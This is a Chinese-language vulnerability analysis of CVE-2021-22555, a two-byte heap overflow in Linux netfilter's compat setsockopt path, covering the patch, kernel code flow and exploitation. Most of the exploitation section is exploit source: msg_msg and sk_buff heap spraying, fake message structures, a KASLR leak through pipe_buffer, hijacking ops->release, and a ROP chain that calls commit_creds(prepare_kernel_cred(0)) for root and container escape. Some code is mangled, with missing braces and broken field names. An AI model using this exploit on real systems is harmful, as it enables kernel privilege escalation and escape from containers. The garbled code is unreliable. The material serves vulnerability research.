CVE-2021-22555 2字节堆溢出写0漏洞提权分析




发布时间 : 2021-09-26 14:30:43


影响版本:Linux v2.6.19-rc1~v5.12-rc7 v5.12-rc8已修补,漏洞存在了15年,评分7.8。 已修复的版本有 5.12,5.10.31, 5.4.113, 4.19.188, 4.14.231, 4.9.267, 4.4.267。 由syzkaller发现,参见crash现场

测试版本:Linux-5.11.14 exploit及测试环境下载地址


CONFIG_IP_NF_IPTABLES=y           // /net/ipv4/netfilter/ip_tables.c

CONFIG_NETFILTER_XTABLES=y        // /net/netfilter/x_tables.c


$ wget
$ tar -xvf linux-5.11.14.tar.xz
# KASAN: 设置 make menuconfig 设置"Kernel hacking" ->"Memory Debugging" -> "KASan: runtime memory debugger"。
$ make -j32
$ make all
$ make modules
# 编译出的bzImage目录:/arch/x86/boot/bzImage。

漏洞描述net/netfilter/x_tables.cNetfilter 模块的ip_tables子模块, 当调用setsockopt()和选项IPT_SO_SET_REPLACE(或 IP6T_SO_SET_REPLACE)时,内核结构需要从32位转换为64位,由于错误计算转换大小,导致在调用 xt_compat_match_from_user() 函数时堆溢出写 0 。攻击者可用于提权,或者从docker、k8s容器(kubernetes)中逃逸。需要CAP_NET_ADMIN权限,或者支持user+network命名空间。

补丁patch 取消pad对齐,也可以禁用非特权用户执行CLONE_NEWUSERCLONE_NEWNET,以缓解该漏洞:echo 0 > /proc/sys/user/max_user_namespaces

diff --git a/net/netfilter/x_tables.c b/net/netfilter/x_tables.c
index 6bd31a7a27fc5..92e9d4ebc5e8d 100644
--- a/net/netfilter/x_tables.c
+++ b/net/netfilter/x_tables.c
@@ -733,7 +733,7 @@ void xt_compat_match_from_user(struct xt_entry_match *m, void **dstptr,
     const struct xt_match *match = m->u.kernel.match;
     struct compat_xt_entry_match *cm = (struct compat_xt_entry_match *)m;
-    int pad, off = xt_compat_match_offset(match);
+    int off = xt_compat_match_offset(match);
     u_int16_t msize = cm->u.user.match_size;
     char name[sizeof(m->];

@@ -743,9 +743,6 @@ void xt_compat_match_from_user(struct xt_entry_match *m, void **dstptr,
         match->compat_from_user(m->data, cm->data);
         memcpy(m->data, cm->data, msize - sizeof(*cm));
-    pad = XT_ALIGN(match->matchsize) - match->matchsize;
-    if (pad > 0)
-        memset(m->data + match->matchsize, 0, pad);

     msize += off;
     m->u.user.match_size = msize;
@@ -1116,7 +1113,7 @@ void xt_compat_target_from_user(struct xt_entry_target *t, void **dstptr,
     const struct xt_target *target = t->;
     struct compat_xt_entry_target *ct = (struct compat_xt_entry_target *)t;
-    int pad, off = xt_compat_target_offset(target);
+    int off = xt_compat_target_offset(target);
     u_int16_t tsize = ct->u.user.target_size;
     char name[sizeof(t->];

@@ -1126,9 +1123,6 @@ void xt_compat_target_from_user(struct xt_entry_target *t, void **dstptr,
         target->compat_from_user(t->data, ct->data);
         memcpy(t->data, ct->data, tsize - sizeof(*ct));
-    pad = XT_ALIGN(target->targetsize) - target->targetsize;
-    if (pad > 0)
-        memset(t->data + target->targetsize, 0, pad);

     tsize += off;
     t->u.user.target_size = tsize;



  • (1)构造4096个msg_msg主消息(0x1000)和辅助消息(0x400),利用2字节溢出写0来修改某个主消息的msg_msg->m_list->next低2字节,使得两个主消息指向同一个辅助消息,将2字节溢出写0转化为UAF
  • (2)注意,spray对象采用skb对象,victim对象采用pipe()管道中的pipe_buf_operations结构。首先利用skb改大msg_msg->m_ts,泄露相邻辅助消息的msg_msg->m_list->prev(主消息地址,也即0x1000堆块地址);
  • (3)再利用skb伪造msg_msg->next指向泄露的主消息地址,泄露msg_msg->m_list->next(辅助消息地址,也即0x400堆块地址);
  • (4)再利用skb伪造msg_msg->m_list->next & prev,以避免再次释放辅助消息时访问无效链表地址导致崩溃;
  • (5)使pipe_buffer结构占据释放后的0x400空闲块,利用读skb泄露其ops指针,也即内核基址;
  • (6)利用skb篡改pipe_buffer->ops->release指针,劫持控制流
  • (7)如果需要进行docker或k8s容器逃逸,则ROP链在执行commit_creds(prepare_kernel_cred(0))提权后,需执行switch_task_namespaces(find_task_by_vpid(1), init_nsproxy),以替换exp进程的命名空间

1. Netfilter介绍

简介:Natfilter 是集成到linux内核协议栈中的一套防火墙系统。


  • (1)Netfilter 中有包含一些表(table),不同的表用来存储不同功能的配置信息,默认有4种table,还可以另外创建。
  • (2)每个table 里有多个chain,chain表示对报文的拦截处理点。例如网络层ipv4有5个拦截点,对应5个chain:报文路由前-PREROUTING,需三层转发的报文-FORWARD,本机生成的报文-OUTPUT,本机接收的报文-INPUT,路由后的报文-POSTROUTING。
  • (3)每个chain 包含一些用户配置的rule,一条rule包含了一个或多个匹配规则(match)和一个执行动作(target)。如果报文符合匹配规则后,需要根据该执行动作(target)来处理报文。标准的匹配元素包含源/目的IP地址、接收/发送设备、传输层协议这五个元素,标准的执行动作包含ACCEPT、DROP、QUEUE、RETURN。


  • (1)对报文的过滤(对应filter表),包含3个chain—INPUT/OUTPUT/FORWARD。
  • (2)对报文的修改(对应mangle表),包含以上5个chain。
  • (3)对会话的连接跟踪(connection track),包含2个chain,OUTPUT/PREROUTING。
  • (4)网络地址转换(NAT),包含3个chain,PREROUNGIN/OUTPUT/POSTROUTIN。

table->chain->rule结构关系图示:在内核空间,每个CPU上维护了一份rule的拷贝(有多少个CPU,就有多少个entries)。这样做是为了减少锁的使用及增加硬件L1 cache的命中次数,以空间换时间。


table->chain->rule具体结构:表用 xt_table -> xt_table_info结构表示;每条rule用ipt_entry结构表示;match匹配规则用xt_entry_match表示(用户空间和内核共享同一结构);target执行动作用xt_entry_target表示(用户空间和内核共享同一结构)。

//(1)xt_table —— 表
struct xt_table {
    struct list_head list;

    /* What hooks you will enter on */
    unsigned int valid_hooks;
    struct xt_table_info *private;                // 指向真正存储rule的结构体

    /* Set this to THIS_MODULE if you are a module, otherwise NULL */
    struct module *me;
    u_int8_t af;                                                    // 表所属的协议族
    int priority;        /* hook order */

    /* called when table is needed in the given netns */
    int (*table_init)(struct net *net);
    const char name[XT_TABLE_MAXNAMELEN];    // 表的名字,如filter/nat/mangle

struct xt_table_info {
    unsigned int size;                                                    // 表中所有规则rule占用的内存大小
    unsigned int number;                                                // 表中存的rule个数
    unsigned int initial_entries;                                // 初始化表时创建的默认rule个数
    unsigned int hook_entry[NF_INET_NUMHOOKS];    // 各个hook(chain)在表中的偏移量
    unsigned int underflow[NF_INET_NUMHOOKS];        // 各个hook(chain)中默认规则在表中的偏移量
    unsigned int stacksize;
    void ***jumpstack;
    unsigned char entries[] __aligned(8);                // 数组,存储各个cpu上自己rule拷贝的内存首地址
//(2)ipt_entry —— 规则rule
struct ipt_entry
    struct ipt_ip ip;                                                        // 规则的基本匹配条件,源IP/目的IP、输入/输出网卡、协议
    unsigned int nfcache;
    u_int16_t target_offset;                                        // ipt_entry + matches 这条规则的target距离规则起点的偏移量
    u_int16_t next_offset;                                            // ipt_entry + matches + target 下一条规则距离这条规则起点的偏移量
    unsigned int comefrom;
    struct xt_counters counters;                                // 计数器,每条规则都有计数器,一旦skb匹配这条规则,那么计数器累加,计数器有字节数和包数两个统计量
    unsigned char elems[0];                                            //这条规则中的match和target,因为不确定到底有几个match,所以使用零长度数组
//(3)xt_entry_match —— 匹配规则match,用户空间和内核空间共享match_size和data字段
#define ipt_entry_match xt_entry_match
struct xt_entry_match
    union {                        // 用户态和内核态使用不同的结构表示match。它们的第一个成员都是match的总大小
        struct {                                        // a. 用户态
            u_int16_t match_size;      
            char name[XT_FUNCTION_MAXNAMELEN-1];    // 该match的版本,通过match的名称与版本信息可以唯一确定一个match。
            u_int8_t revision;
        } user;
        struct {                                        // b. 内核态
            u_int16_t match_size;
            struct xt_match *match;                                // 指向扩展的match信息(每一个扩展match都是一个xt_match对象)。根据ipt_entry_match.u.user.name找到对应的match,将ipt_entry_match.u.kernel.match指针指向系统中已注册的struct xt_match对象
        } kernel;
        u_int16_t match_size;                // 整个match占用的内存空间
    } u;
    unsigned char data[0];
//(4)xt_entry_target —— 执行动作target,用户空间和内核空间共享match_size字段
#define ipt_entry_target xt_entry_target
struct xt_entry_target
    union {
        struct {                                        // a. 用户态
            u_int16_t target_size;
            char name[XT_FUNCTION_MAXNAMELEN-1];
            u_int8_t revision;
        } user;
        struct {                                        // b. 内核态
            u_int16_t target_size;
            struct xt_target *target;                            // target信息,如果target->target()函数指针为NULL,那么是一个标准target,否则为扩展target。根据ipt_entry_target.u.user.name找到对应的target,将ipt_entry_target.u.kernel.target指针指向系统中已注册的struct xt_target对象
        } kernel;
        u_int16_t target_size;
    } u;
    unsigned char data[0];                // 对于扩展target,该指针指向内容会传给其target()回调,这个指针内容由扩展target自由使用,只要内核态和用户态保持一致就可以



2. 漏洞分析

2-1 漏洞原因


int xt_compat_target_offset(const struct xt_target *target)
    u_int16_t csize = target->compatsize ? : target->targetsize;
    return XT_ALIGN(target->targetsize) - COMPAT_XT_ALIGN(csize);

void xt_compat_target_from_user(struct xt_entry_target *t, void **dstptr,
                unsigned int *size)
    const struct xt_target *target = t->;
    struct compat_xt_entry_target *ct = (struct compat_xt_entry_target *)t;    // ct=t的副本
    int pad, off = xt_compat_target_offset(target);
    u_int16_t tsize = ct->u.user.target_size;
    char name[sizeof(t->];

    t = *dstptr;
    memcpy(t, ct, sizeof(*ct));        // ct 拷贝到 dstptr
    if (target->compat_from_user)
        target->compat_from_user(t->data, ct->data);
        memcpy(t->data, ct->data, tsize - sizeof(*ct));
    pad = XT_ALIGN(target->targetsize) - target->targetsize;    // [1] 对缓冲区进行8字节对齐,target->targetsize 用来指定t->data实际使用长度
    if (pad > 0)
        memset(t->data + target->targetsize, 0, pad);            // [2] 将不足8字节的剩余空间清0,存在越界写0

    tsize += off;
    t->u.user.target_size = tsize;
    strlcpy(name, target->name, sizeof(name));
    strncpy(t->, name, sizeof(t->;

    *size += off;
    *dstptr += tsize;

2-2 漏洞触发流程跟踪

ip_tables模块初始化流程ip_tables_init() -> nf_register_sockopt() -> struct nf_sockopt_ops ipt_sockopts 注册setsockopt。这样用户调用setsockopt时,才能找到对应的处理函数,也即do_ipt_set_ctl()

static int __init ip_tables_init(void)
    int ret;
    ret = register_pernet_subsys(&ip_tables_net_ops);
    ret = xt_register_targets(ipt_builtin_tg, ARRAY_SIZE(ipt_builtin_tg));
    ret = xt_register_matches(ipt_builtin_mt, ARRAY_SIZE(ipt_builtin_mt));
    /* Register setsockopt */
    ret = nf_register_sockopt(&ipt_sockopts);                // <------------- nf_register_sockopt()
    [... ...]
    return ret;
static struct nf_sockopt_ops ipt_sockopts = {
    .pf        = PF_INET,
    .set_optmin    = IPT_BASE_CTL,
    .set_optmax    = IPT_SO_SET_MAX+1,
    .set        = do_ipt_set_ctl,                            // <--------------- do_ipt_set_ctl()
    .get_optmin    = IPT_BASE_CTL,
    .get_optmax    = IPT_SO_GET_MAX+1,
    .get        = do_ipt_get_ctl,
    .owner        = THIS_MODULE,

漏洞触发流程setsockopt(s, SOL_IP, IPT_SO_SET_REPLACE, ...) -> nf_setsockopt() -> do_ipt_set_ctl() -> compat_do_replace() -> translate_compat_table() -> compat_copy_entry_from_user() -> xt_compat_match_from_user & xt_compat_target_from_user()

总之就是将用户传入的rule规则进行转换存储时,出现堆溢出写0。构造用户参数data,通过控制pad大小,控制溢出字节数。data->ipt_replace->size = 0xFB6,导致分配sizeof(xt_table_info) + ipt_replace->size = 0x40+0xfB6 = 0xff6的堆块,转换用户传入规则时错误对齐,刚好溢出覆盖下一个0x1000堆块的前2 字节,造成指针的指向错误。

用户参数:综上,用户传入的参数结构为 ipt_replace + ipt_entry + xt_entry_match + pad + xt_entry_target。注意, compat_ipt_replace 等同于 ipt_replace 结构。

// do_ipt_set_ctl()
static int do_ipt_set_ctl(struct sock *sk, int cmd, sockptr_t arg, unsigned int len)
    int ret;

    if (!ns_capable(sock_net(sk)->user_ns, CAP_NET_ADMIN))            // [1] 需满足 CAP_NET_ADMIN 权限,可以在启动脚本赋予exp权限,或者支持namespace就行
        return -EPERM;

    switch (cmd) {
#ifdef CONFIG_COMPAT                                                // 编译内核时需设置 CONFIG_COMPAT
        if (in_compat_syscall())
            ret = compat_do_replace(sock_net(sk), arg, len);        // [2] <-----------------
            ret = do_replace(sock_net(sk), arg, len);
    ... ...
    return ret;
// [2] compat_do_replace() —— 分配 xt_table_info 结构, 拷贝用户参数
static int compat_do_replace(struct net *net, sockptr_t arg, unsigned int len)
    int ret;
    struct compat_ipt_replace tmp;
    struct xt_table_info *newinfo;
    void *loc_cpu_entry;
    struct ipt_entry *iter;

    if (copy_from_sockptr(&tmp, arg, sizeof(tmp)) != 0)                // [3] 获取size参数,用户参数开头是 compat_ipt_replace (内核)变长结构,等同于 ipt_replace (用户)结构
        return -EFAULT;

    /* overflow check */
    if (tmp.num_counters >= INT_MAX / sizeof(struct xt_counters))
        return -ENOMEM;
    if (tmp.num_counters == 0)
        return -EINVAL;[sizeof(] = 0;

    newinfo = xt_alloc_table_info(tmp.size);                        // [4] 分配空间 kvmalloc(sz, GFP_KERNEL_ACCOUNT);    sz = sizeof(xt_table_info) + ipt_replace->size = 0x40 + (0xFB8 - 0x2) = 0xFF8 - 0x2  注意两点,一是分配采用 GFP_KERNEL_ACCOUNT 标志(与GFP_KERNEL相同,除了分配记入kmemcg),二是分配的堆块属于0x1000。  分配之后赋值 xt_table_info->size = ipt_replace->size = 0xFB6
    if (!newinfo)
        return -ENOMEM;

    loc_cpu_entry = newinfo->entries;
    if (copy_from_sockptr_offset(loc_cpu_entry, arg, sizeof(tmp),    // [5] 拷贝用户参数, 从偏移arg+sizeof(ipt_replace) 开始拷贝,跳过 ipt_replace 结构
            tmp.size) != 0) {
        ret = -EFAULT;
        goto free_newinfo;

    ret = translate_compat_table(net, &newinfo, &loc_cpu_entry, &tmp); // [6] <--------------
    if (ret != 0)
        goto free_newinfo;

    ret = __do_replace(net,, tmp.valid_hooks, newinfo,
               tmp.num_counters, compat_ptr(tmp.counters));
    ... ...
    return ret;
// [6] translate_compat_table() —— 分配新的 xt_table_info 结构,进行转换
static int translate_compat_table(struct net *net,
               struct xt_table_info **pinfo,
               void **pentry0,
               const struct compat_ipt_replace *compatr)
    unsigned int i, j;
    struct xt_table_info *newinfo, *info;
    void *pos, *entry0, *entry1;
    struct compat_ipt_entry *iter0;
    struct ipt_replace repl;
    unsigned int size;
    int ret;

    info = *pinfo;
    entry0 = *pentry0;
    size = compatr->size;
    info->number = compatr->num_entries;        // 传入的是1
    ... ...
    newinfo = xt_alloc_table_info(size);                            // [7] 分配新的 xt_table_info 结构 —— newinfo
    if (!newinfo)
        goto out_unlock;

    newinfo->number = compatr->num_entries;
    for (i = 0; i < NF_INET_NUMHOOKS; i++) {
        newinfo->hook_entry[i] = compatr->hook_entry[i];
        newinfo->underflow[i] = compatr->underflow[i];
    entry1 = newinfo->entries;                    // 
    pos = entry1;
    size = compatr->size;                        // size = 0xFB8 - 0x2 = 0xfb6
    xt_entry_foreach(iter0, entry0, compatr->size)
        compat_copy_entry_from_user(iter0, &pos, &size,                // [8] <-------------- 转换entry结构,从32位到64位,传给 newinfo
                        newinfo, entry1);
    ... ...
// [8] compat_copy_entry_from_user() —— 旧的 xt_table_info 拷贝到新的 xt_table_info 结构
static void compat_copy_entry_from_user(struct compat_ipt_entry *e, void **dstptr,
                unsigned int *size,
                struct xt_table_info *newinfo, unsigned char *base)
    struct xt_entry_target *t;
    struct ipt_entry *de;
    unsigned int origsize;
    int h;
    struct xt_entry_match *ematch;

    origsize = *size;
    de = *dstptr;
    memcpy(de, e, sizeof(struct ipt_entry));                        // [9] 先拷贝 ipt_entry 结构
    memcpy(&de->counters, &e->counters, sizeof(e->counters));        //     包和字节计数

    *dstptr += sizeof(struct ipt_entry);
    *size += sizeof(struct ipt_entry) - sizeof(struct compat_ipt_entry);

    xt_ematch_foreach(ematch, e)
        xt_compat_match_from_user(ematch, dstptr, size);            // [10] 再拷贝 xt_entry_match 结构, off=4, pad=4, msize=u.user.match_size+off=0xf26+4=0xf2a(用户传入的), match->matchsize=4, 拷贝完成后*dstptr+= msize = 0xffff888006e010b0+0xf2a = FFFF888006E01FDA, size+=off = 0xfba

    de->target_offset = e->target_offset - (origsize - *size);        // target_offset 原来是 ipt_entry + matches 结构的大小,现在减小了 4
    t = compat_ipt_get_target(e);
    xt_compat_target_from_user(t, dstptr, size);                    // [11] <------------ 漏洞函数: 再拷贝 xt_entry_target 结构, 如下所示

    de->next_offset = e->next_offset - (origsize - *size);
    ... ...
// [11] xt_compat_target_from_user() —— 拷贝 xt_entry_target 结构,对齐导致溢出
void xt_compat_target_from_user(struct xt_entry_target *t, void **dstptr,
                unsigned int *size)
    const struct xt_target *target = t->;
    struct compat_xt_entry_target *ct = (struct compat_xt_entry_target *)t;
    int pad, off = xt_compat_target_offset(target);            // off = target->targetsize = 4
    u_int16_t tsize = ct->u.user.target_size;                // tsize = 0x20
    char name[sizeof(t->];

    t = *dstptr;                                            // t = 0xffff888006e01fda
    memcpy(t, ct, sizeof(*ct));                                // 拷贝0x20
    if (target->compat_from_user)
        target->compat_from_user(t->data, ct->data);
        memcpy(t->data, ct->data, tsize - sizeof(*ct));
    pad = XT_ALIGN(target->targetsize) - target->targetsize;// pad = 4
    if (pad > 0)
        memset(t->data + target->targetsize, 0, pad);        // [12] t+0x20+4 处填充pad个0,也就是 0xffff888006e01ffe处填4个0,溢出2个字节, <------------------------- 溢出点

    tsize += off;                                            // tsize = 0x24
    t->u.user.target_size = tsize;                            // 
    strlcpy(name, target->name, sizeof(name));
    strncpy(t->, name, sizeof(t->;

    *size += off;                                            // *size= 0xfba+4 = 0xfbe
    *dstptr += tsize;                                        // *dstptr = 0xffff888006e01ffe

漏洞对象xt_table_info 变长结构,entries为用户传入,每个entries 包含 ipt_entry + xt_entry_match + pad + xt_entry_target,第一节中已经介绍过。

struct xt_table_info {
    unsigned int size;            // entries 总大小, 不包括 xt_table_info 结构大小0x40
    unsigned int number;        // entries 数目
    unsigned int initial_entries;
    unsigned int hook_entry[NF_INET_NUMHOOKS];
    unsigned int underflow[NF_INET_NUMHOOKS];
    unsigned int stacksize;
    void ***jumpstack;

    unsigned char entries[] __aligned(8);    // 每个`entries` 包含 `ipt_entry` + `xt_entry_match` + pad + `xt_entry_target`

3. 漏洞利用

msg_msg结构的创建与读取,也即消息的发送与接收,可以参考文章 Linux内核中利用msg_msg结构实现任意地址读写 中对msgsnd()msgrcv()源码的分析过程。

3-1 漏洞转化:2字节溢出写0转化为UAF



  for (int i = 0; i < NUM_MSQIDS; i++) {
    if ((msqid[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666)) < 0) {
      perror("[-] msgget");
      goto err_no_rmid;



int write_msg(int msqid, const void *msgp, size_t msgsz, long msgtyp) {
  *(long *)msgp = msgtyp;
  if (msgsnd(msqid, msgp, msgsz - sizeof(long), 0) < 0) {
    perror("[-] msgsnd");
    return -1;
  return 0;

  printf("[*] Spraying primary messages...\n");
  for (int i = 0; i < NUM_MSQIDS; i++) {
    memset(&msg_primary, 0, sizeof(msg_primary));
    *(int *)&msg_primary.mtext[0] = MSG_TAG;
    *(int *)&msg_primary.mtext[4] = i;
    if (write_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) <
      goto err_rmid;

int msgsend(int msgid, const void *msg_ptr, size_t msg_sz, int msgflg)

msgid——消息队列标识符;msg_ptr——指向结构体{mtype, mtext};msg_ptr.mtext[0]=MSG_TAG—— 标识该内存区域为堆喷控制;msg_ptr.mtext[4]=i—— 标识该内存区id,以便识别内存区。




  printf("[*] Spraying secondary messages...\n");
  for (int i = 0; i < NUM_MSQIDS; i++) {
    memset(&msg_secondary, 0, sizeof(msg_secondary));
    *(int *)&msg_secondary.mtext[0] = MSG_TAG;
    *(int *)&msg_secondary.mtext[4] = i;
    if (write_msg(msqid[i], &msg_secondary, sizeof(msg_secondary),
                  MTYPE_SECONDARY) < 0)
      goto err_rmid;



int read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
  if (msgrcv(msqid, msgp, msgsz - sizeof(long), msgtyp, 0) < 0) {
    perror("[-] msgrcv");
    return -1;
  return 0;

  printf("[*] Creating holes in primary messages...\n");
  for (int i = HOLE_STEP; i < NUM_MSQIDS; i += HOLE_STEP) {
    if (read_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) <
      goto err_rmid;



利用2字节溢出,将相邻的msg_msg结构体中msg_msg->m_list->next末尾两字节覆盖为0, 使得该主消息的msg_msg->m_list->next指向其他主消息的辅助消息。


  printf("[*] Triggering out-of-bounds write...\n");
  if (trigger_oob_write(s) < 0)
    goto err_rmid;




  printf("[*] Searching for corrupted primary message...\n");
  for (int i = 0; i < NUM_MSQIDS; i++) {
    if (i != 0 && (i % HOLE_STEP) == 0)
    if (peek_msg(msqid[i], &msg_secondary, sizeof(msg_secondary), 1) < 0)
      goto err_no_rmid;
    if (*(int *)&msg_secondary.mtext[0] != MSG_TAG) {
      printf("[-] Error could not corrupt any primary message.\n");
      goto err_no_rmid;
    if (*(int *)&msg_secondary.mtext[4] != i) {
      fake_idx = i;
      real_idx = *(int *)&msg_secondary.mtext[4];

  if (fake_idx == -1 && real_idx == -1) {
    printf("[-] Error could not corrupt any primary message.\n");
    goto err_no_rmid;

  // fake_idx's primary message has a corrupted next pointer; wrongly
  // pointing to real_idx's secondary message.
  printf("[+] fake_idx: %x\n", fake_idx);
  printf("[+] real_idx: %x\n", real_idx);



  • 1.主消息1放弃辅助消息msg_msg, skb占据msg_msg
  • 2.主消息2放弃辅助消息msg_msg, victim结构占据msg_msg
  • 3.此时skb与victim结构占据同一内存空间
  • 4.修改skb劫持victim结构内函数指针
  • 5.触发victim结构函数指针,劫持控制流


3-2 避免崩溃:伪造msg_msg->m_list->next & prev指针


  printf("[*] Freeing real secondary message...\n");
  if (read_msg(msqid[real_idx], &msg_secondary, sizeof(msg_secondary),
               MTYPE_SECONDARY) < 0)
    goto err_rmid;



void build_msg_msg(struct msg_msg *msg, uint64_t m_list_next,
                   uint64_t m_list_prev, uint64_t m_ts, uint64_t next) {
  msg->m_list_next = m_list_next;
  msg->m_list_prev = m_list_prev;
  msg->m_type = MTYPE_FAKE;
  msg->m_ts = m_ts;
  msg->next = next;
  msg->security = 0;

int spray_skbuff(int ss[NUM_SOCKETS][2], const void *buf, size_t size) {
  for (int i = 0; i < NUM_SOCKETS; i++) {
    for (int j = 0; j < NUM_SKBUFFS; j++) {
      if (write(ss[i][0], buf, size) < 0) {
        perror("[-] write");
        return -1;
  return 0;

  printf("[*] Spraying fake secondary messages...\n");
  memset(secondary_buf, 0, sizeof(secondary_buf));
  build_msg_msg((void *)secondary_buf, 0x41414141, 0x42424242,
                PAGE_SIZE - MSG_MSG_SIZE, 0);
  if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto err_rmid;




  // Use the fake secondary message to read out-of-bounds.
  printf("[*] Leaking adjacent secondary message...\n");
  if (peek_msg(msqid[fake_idx], &msg_fake, sizeof(msg_fake), 1) < 0)
    goto err_rmid;

  // Check if the leak is valid.
  if (*(int *)&msg_fake.mtext[SECONDARY_SIZE] != MSG_TAG) {
    printf("[-] Error could not leak adjacent secondary message.\n");
    goto err_rmid;

  // The secondary message contains a pointer to the primary message.
  msg = (struct msg_msg *)&msg_fake.mtext[SECONDARY_SIZE - MSG_MSG_SIZE];
  kheap_addr = msg->m_list_next;
  if (kheap_addr & (PRIMARY_SIZE - 1))
    kheap_addr = msg->m_list_prev;
  printf("[+] kheap_addr: %" PRIx64 "\n", kheap_addr);


释放skb,重新填充该fake辅助消息,msg_msg->next = kheap_addr,因此,某个主消息成了该辅助消息的segment(msg_msgseg结构)。这样就能越界读取主消息的头,主消息的msg_msg->m_list->next指向与之对应的辅助消息,也即fake辅助消息相邻的辅助消息,该内存地址-0x400,即为fake辅助消息的真实地址。


  printf("[*] Freeing fake secondary messages...\n");
  free_skbuff(ss, secondary_buf, sizeof(secondary_buf));

  // Put kheap_addr at next to leak its content. Assumes zero bytes before
  // kheap_addr.
  printf("[*] Spraying fake secondary messages...\n");
  memset(secondary_buf, 0, sizeof(secondary_buf));
  build_msg_msg((void *)secondary_buf, 0x41414141, 0x42424242,
                sizeof(msg_fake.mtext), kheap_addr - MSG_MSGSEG_SIZE);      // fist 8 bytes must be NULL
  if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto err_rmid;

  // Use the fake secondary message to read from kheap_addr.
  printf("[*] Leaking primary message...\n");
  if (peek_msg(msqid[fake_idx], &msg_fake, sizeof(msg_fake), 1) < 0)
    goto err_rmid;

  // Check if the leak is valid.
  if (*(int *)&msg_fake.mtext[PAGE_SIZE] != MSG_TAG) {
    printf("[-] Error could not leak primary message.\n");
    goto err_rmid;

  // The primary message contains a pointer to the secondary message.
  msg = (struct msg_msg *)&msg_fake.mtext[PAGE_SIZE - MSG_MSG_SIZE];
  kheap_addr = msg->m_list_next;
  if (kheap_addr & (SECONDARY_SIZE - 1))
    kheap_addr = msg->m_list_prev;

  // Calculate the address of the fake secondary message.
  kheap_addr -= SECONDARY_SIZE;
  printf("[+] kheap_addr: %" PRIx64 "\n", kheap_addr);


3-3 绕过KASLR


方法:伪造fake辅助消息,msg_msg->m_list->next == msg_msg->m_list->pre == fake辅助消息;利用主消息2释放辅助消息,使用pipefd函数分配pipe_buffer结构体重新占据fake辅助消息堆块;通过读skb泄露anon_pipe_buf_ops地址,绕过KASLR。pipe_buffer结构体中ops成员指向全局变量anon_pipe_buf_ops

为什么不用tty_struct 来泄露?

  printf("[*] Freeing fake secondary messages...\n");
  free_skbuff(ss, secondary_buf, sizeof(secondary_buf));

  // Put kheap_addr at m_list_next & m_list_prev so that list_del() is possible.
  printf("[*] Spraying fake secondary messages...\n");
  memset(secondary_buf, 0, sizeof(secondary_buf));
  build_msg_msg((void *)secondary_buf, kheap_addr, kheap_addr, 0, 0);
  if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto err_rmid;

  printf("[*] Freeing sk_buff data buffer...\n");
  if (read_msg(msqid[fake_idx], &msg_fake, sizeof(msg_fake), MTYPE_FAKE) < 0)
    goto err_rmid;

  printf("[*] Spraying pipe_buffer objects...\n");
  for (int i = 0; i < NUM_PIPEFDS; i++) {
    if (pipe(pipefd[i]) < 0) {
      perror("[-] pipe");
      goto err_rmid;
    // Write something to populate pipe_buffer.
    if (write(pipefd[i][1], "pwn", 3) < 0) {
      perror("[-] write");
      goto err_rmid;

  printf("[*] Leaking and freeing pipe_buffer object...\n");
  for (int i = 0; i < NUM_SOCKETS; i++) {
    for (int j = 0; j < NUM_SKBUFFS; j++) {
      if (read(ss[i][1], secondary_buf, sizeof(secondary_buf)) < 0) {
        perror("[-] read");
        goto err_rmid;
      if (*(uint64_t *)&secondary_buf[0x10] != MTYPE_FAKE)
        pipe_buffer_ops = *(uint64_t *)&secondary_buf[0x10];

  kbase_addr = pipe_buffer_ops - ANON_PIPE_BUF_OPS;
  printf("[+] anon_pipe_buf_ops: %" PRIx64 "\n", pipe_buffer_ops);
  printf("[+] kbase_addr: %" PRIx64 "\n", kbase_addr);

3-4 劫持控制流


  printf("[*] Spraying fake pipe_buffer objects...\n");
  memset(secondary_buf, 0, sizeof(secondary_buf));
  buf = (struct pipe_buffer *)&secondary_buf;
  buf->ops = kheap_addr + 0x290;
  ops = (struct pipe_buf_operations *)&secondary_buf[0x290];
#ifdef KERNEL_COS_5_4_89
  // RAX points to &buf->ops.
  // RCX points to &buf.
  ops->release = kbase_addr + PUSH_RAX_JMP_QWORD_PTR_RCX;
#elif KERNEL_UBUNTU_5_8_0_48
  // RSI points to &buf.
  ops->release = kbase_addr + PUSH_RSI_JMP_QWORD_PTR_RSI_39;
  build_krop(secondary_buf, kbase_addr, kheap_addr + 0x2B0);
  if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto err_rmid;

  // Trigger pipe_release().
  printf("[*] Releasing pipe_buffer objects...\n");
  for (int i = 0; i < NUM_PIPEFDS; i++) {
    if (close(pipefd[i][0]) < 0) {
      perror("[-] close");
      goto err_rmid;
    if (close(pipefd[i][1]) < 0) {
      perror("[-] close");
      goto err_rmid;



  • (1)没有找到类似mov rsp, rsipush rsi; pop rsp的gadget,只能先伪造pipe_buffer->ops函数表,pipe_buffer->ops->release指向gadget—push rsi; jmp qword ptr [rsi + 0x39]
  • (2)在RSI+0x39处(pipe_buffer+0x39处)放置gadget—pop rsp; ret;
  • (3)在RSI处(pipe_buffer处)放置gadget—add rsp, 0xd0; ret; 避免破坏pipe_buffer+0x10 - 0x18
  • (4)在RSI+0xd8处(pipe_buffer+0xd8处)继续布置ROP链
  • (5)先将RBP保存到RSI+0x2b0处(pipe_buffer+0x2b0处),注意,enter 0, 0 指令等同于 push rbp; mov rbp, rsp —— rbp=rspenter 8, 0 指令等同于 push rbp; mov rbp, rsp; sub rsp, 8
      // Save RBP at scratchpad_addr.
      *rop++ = kbase_addr + ENTER_0_0_POP_RBX_POP_R12_POP_RBP_RET;                  // enter 0, 0 ; pop rbx ; pop r12 ; pop rbp ; ret 
      *rop++ = scratchpad_addr; // R12
      *rop++ = 0xDEADBEEF;      // RBP
      *rop++ = kbase_addr + MOV_QWORD_PTR_R12_RBX_POP_RBX_POP_R12_POP_RBP_RET;      // mov qword ptr [r12], rbx; pop rbx; pop r12; pop r13; pop rbp; ret;
      *rop++ = 0xDEADBEEF; // RBX
      *rop++ = 0xDEADBEEF; // R12
      *rop++ = 0xDEADBEEF; // R13
      *rop++ = 0xDEADBEEF; // RBP
  • (6)执行commit_creds(prepare_kernel_cred(0))提权
      // commit_creds(prepare_kernel_cred(NULL))
